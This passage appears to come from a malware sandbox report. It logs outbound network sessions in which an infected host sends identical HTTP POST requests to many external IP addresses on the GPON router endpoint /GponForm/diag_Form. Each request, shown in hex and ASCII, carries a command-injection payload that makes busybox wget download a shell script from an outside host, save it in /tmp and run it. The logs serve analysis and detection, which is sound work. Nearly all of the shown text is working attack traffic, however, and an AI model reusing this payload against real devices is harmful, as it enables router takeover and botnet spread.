                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.1333456109.216.111.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436372995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.1341794118.147.102.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436459064 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.13569705.227.157.136443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436459064 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.13466785.198.204.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447360992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.1335274212.227.248.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447362900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.1349208109.83.116.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447365046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.136065842.65.104.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447391987 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.1345986212.99.47.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447413921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.13576125.186.9.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447418928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.135643242.119.135.108443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447432995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.1353310212.12.133.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447746992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.13498705.50.212.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447767019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.13505745.168.43.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447767973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.13391425.99.44.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447809935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.1343466109.233.252.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447810888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        198192.168.2.135596842.130.183.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447810888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.1338216118.75.127.228443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:50.447834969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.1345018212.73.202.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452316046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.1360770212.88.16.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452316046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.13554165.69.233.45443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452326059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.13592405.22.76.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452331066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.13337085.223.162.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452354908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.13524825.200.8.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:53.452357054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
